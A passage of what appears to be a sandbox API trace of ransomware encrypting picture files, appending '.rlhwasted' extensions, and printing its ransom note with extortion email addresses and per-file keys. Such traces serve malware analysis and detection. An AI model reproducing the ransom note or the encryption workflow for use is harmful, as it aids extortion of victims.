lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.331] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.331] lstrcpyW (in: lpString1=0x6e7fa8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\AFZ-XHK6Yw.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\afz-xhk6yw.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\AFZ-XHK6Yw.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\afz-xhk6yw.png.rlhwasted")) returned 1 [0196.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\AFZ-XHK6Yw.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\afz-xhk6yw.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0196.332] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0196.332] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1f91 [0196.332] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f91) returned 0x6a0000 [0196.333] CloseHandle (hObject=0x12c) returned 1 [0196.335] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.335] CloseHandle (hObject=0x10c) returned 1 [0196.335] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.335] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.336] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.336] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.336] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.337] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.337] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.348] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8428 [0196.348] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.348] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.348] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]i0jXurf8HDM/a9wMGcYGGIzfBURQC7PJ8DwCAdkWd9lb89Dp1UtmER4W/6cyO+pc\r\nZizBd8i0RDiXFhEQItXUBy8Q1sn9jV5cyJpC+BQHOTMqeVksiU9ItMjjDPdagqWb\r\nLFxpq3BDasXkBkHCZmWJA1NRy/onDvigZxYnzVw6P35ObTCNcf3G5U1TsSK2AJAQ\r\noRulPa4gzHYmEmK0baS2i4rnoz0blvb7BIT6UxO5rXibbOe7CfMnfaR9YltvApMC\r\nBOy8xOhaxKSpnzG0+y2nFjwYqxlLhWjrDD+cUFNfLqt+PmCvaFelHf8XerPiPZOs\r\n6H/j7UuxGhgiXRVHpyQO1NkNzw0gL2aT8lvyVjTukyFFj/qs1gIXSmBrH9ouKEdZ\r\n3o5zo7vVyFBA7musgZpj9izIJWJbJ5kXlT0YXd0oWt3/Z/TD7dvsmlVGiO7cDbeM\r\nkQKIKmfIv/mVi6W3z+/Au8sEqcSrud1SpB1RPmlfmQ3XvgEbyWb2s9/ZsAVHphQ7\r\ne8NXpaR5Jel87CFGwqBVHsyfqVT+aINhJq0PwL5bGN/KMYD9NHCjbIB5vzOJsra0\r\n66jq9LFGhW5dNVQy81g0LjV6qBiKgi1n1SLcZLBApHCendZRkNtOz7A3IexTeKgp\r\n+5VOpD6pqKIyk6+Gagor4o9eWcxCzod3AamSJ8dew9B=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.348] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8428 | out: hHeap=0x6b0000) returned 1 [0196.348] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.348] SetEndOfFile (hFile=0x124) returned 1 [0196.351] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.351] CloseHandle (hObject=0x124) returned 1 [0196.353] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.353] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8248 | out: hHeap=0x6b0000) returned 1 [0196.353] _aulldvrm () returned 0x0 [0196.353] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.355] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.355] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\baE4zlN1SLoXL.png") returned 75 [0196.355] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a0) returned 0x6e7988 [0196.355] lstrcpyW (in: lpString1=0x6e7a1e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.355] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.355] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.356] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.356] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\baE4zlN1SLoXL.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\bae4zln1sloxl.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.357] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.358] SetEndOfFile (hFile=0x124) returned 1 [0196.358] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.358] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.358] lstrcpyW (in: lpString1=0x6e7a1e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\baE4zlN1SLoXL.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\bae4zln1sloxl.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\baE4zlN1SLoXL.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\bae4zln1sloxl.png.rlhwasted")) returned 1 [0196.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\baE4zlN1SLoXL.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\bae4zln1sloxl.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0196.360] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0196.360] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x11f67 [0196.360] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11f67) returned 0xb00000 [0196.360] CloseHandle (hObject=0x10c) returned 1 [0196.365] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.366] CloseHandle (hObject=0x12c) returned 1 [0196.366] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.366] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.414] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.414] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.414] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.415] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.415] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.424] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e7f18 [0196.424] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.424] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.424] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Xfilmrflb2dInK5QPL2ifXi5k6/KjlUvqBgMnqGoh0E1DB3bN3pZsDk6R7UUXsFI\r\nuUK5e0n3YVz5dHAuBZIoaUldh+gaRyklhprUKDMsI5nYsZhwwDg5GizDJj8SefdT\r\np5kLPQ750aHsv8vQ07OMdmmFejJxvoUXHzofcez8X3BhM1S2mAHQRC/rkM6Nx3nN\r\nZcR/4DuWk4SJAUsK1gyL7jzlvBkyRSGKBxY+Vd3i+E7mXl4LlrJoF+DEBQE1zUwc\r\nHIhCSb1xtU9y4rLZg+MnKuwradyoWxcyoAdlUqeFGaiih2fOO+fgu+cQGWEbajvN\r\ndc4ahyr6jreU0ZpRFa3cbykS8wpvkgNCKs1/7eopZByOL1oL5pJkZAE1fLfeZrMW\r\ntFq/cljZ9+5W6FEnhjpNgJhP0Od98kkm6KU8GwFVnFdAoURY8onhwm2fGJeo0ziu\r\n6fQLleO7v0MTMfhnsPWu8iUAB+MRP7IHba5AIDKKn+XWfp3J1maFECwfieUSRm/X\r\n3sqC2vaauk/+yoHVxdzWNJSsXfRoY5eCEzXWot3LpK0RZKUqvmegSnFd3JeF+rBv\r\nWQIpWgDhZay8HWBxb0fz2hR29rNaBPvr/GtKy8YLlFSs09O2MoHIyKDRV81fwzbh\r\n5/AVSSnn4bZnW0WHO7EpTJsY9xg1wTyMqdj61vV9MkJ=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.425] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.425] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.425] SetEndOfFile (hFile=0x124) returned 1 [0196.427] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.428] CloseHandle (hObject=0x124) returned 1 [0196.429] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.430] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8338 | out: hHeap=0x6b0000) returned 1 [0196.430] _aulldvrm () returned 0x0 [0196.430] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.431] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.432] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.432] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\GT0W.gif") returned 66 [0196.432] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28e) returned 0x6d4580 [0196.432] lstrcpyW (in: lpString1=0x6d4604, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.432] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.432] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.433] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.433] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\GT0W.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\gt0w.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.434] WriteFile (in: hFile=0x124, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.435] SetEndOfFile (hFile=0x124) returned 1 [0196.436] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.436] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.436] lstrcpyW (in: lpString1=0x6d4604, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\GT0W.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\gt0w.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\GT0W.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\gt0w.gif.rlhwasted")) returned 1 [0196.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\GT0W.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\gt0w.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0196.470] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.470] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x14d26 [0196.470] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14d26) returned 0xb00000 [0196.471] CloseHandle (hObject=0x12c) returned 1 [0196.476] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0196.477] CloseHandle (hObject=0x128) returned 1 [0196.477] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.477] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0196.478] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.478] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.478] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0196.479] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0196.479] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.489] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.489] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oD1iy1CguDluRAQtOQh1qFWEZAoOc6RC4HTY3bjkGjA3Uab9/4wfhtcYfW/S2uZf\r\nCpas8yZFXrSZ5kRHHMQ6+vwda9g/WAEBMIL1tCTEnHHsTg2seJchdHT1z56E4LDS\r\nKcWHsqhkXIRsClIKN2fD19VISdD7Q7a1gRL9w8EZkifTUHEQb7XRqNBjN9ATbFeg\r\naztpTyyeKbSZw6sxILkqe6AYcvXPYIwo+o1jVDIp1qc791PH32sZ/VtwipIGXlpH\r\nwFA24zlwHRBCuV/ekR3woXD7M3km55PeSnnA6IgrG1d9hWEuEIWN0P+aY4E4T6Jz\r\nY6rZyoqs1/TWwzb0Qsma0cqTKFes58RvV7Z7YfweJxkFh05meKhWnUXGmnagEOgf\r\nvkxDUQBTsJ1FohNPXa4ZuzdhlfXxJCtvCYoUVlTIewgBGdwXIER2Vk6wTIQc1cbE\r\ngzZ4aa19nXaRvQMhGVHPQV0kCuHL+OzSpk/MKLMTwyMJU+GoKuz7c1oUdCTKmfHs\r\nASlnxLAnXL7hZ9i+ct3MBzUtv77lR+2shvKhlJ8XFqrI/hD0z0QzfLYSCgGx1Uwx\r\njFmvNh71DXj+iRERgTMK1Zj0ky3NR8Lasy1PQnRLZUv6Tybvy0bQ3u6A4zLgcpmi\r\nIzqfKgYj0/22CKLPjeFHhqpWPp67+d4qWT3HHsJJSNx=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.489] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.489] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0196.490] SetEndOfFile (hFile=0x124) returned 1 [0196.492] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.492] CloseHandle (hObject=0x124) returned 1 [0196.494] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.495] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f2150 | out: hHeap=0x6b0000) returned 1 [0196.495] _aulldvrm () returned 0x0 [0196.495] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0196.496] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0196.496] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\mwAemE5aW.gif") returned 71 [0196.496] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6d4580 [0196.496] lstrcpyW (in: lpString1=0x6d460e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.496] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.496] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0196.497] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.497] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\mwAemE5aW.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\mwaeme5aw.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0196.498] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0196.499] SetEndOfFile (hFile=0x124) returned 1 [0196.500] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.500] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.500] lstrcpyW (in: lpString1=0x6d460e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\mwAemE5aW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\mwaeme5aw.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\mwAemE5aW.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\mwaeme5aw.gif.rlhwasted")) returned 1 [0196.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\mwAemE5aW.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\mwaeme5aw.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.501] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0196.502] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: 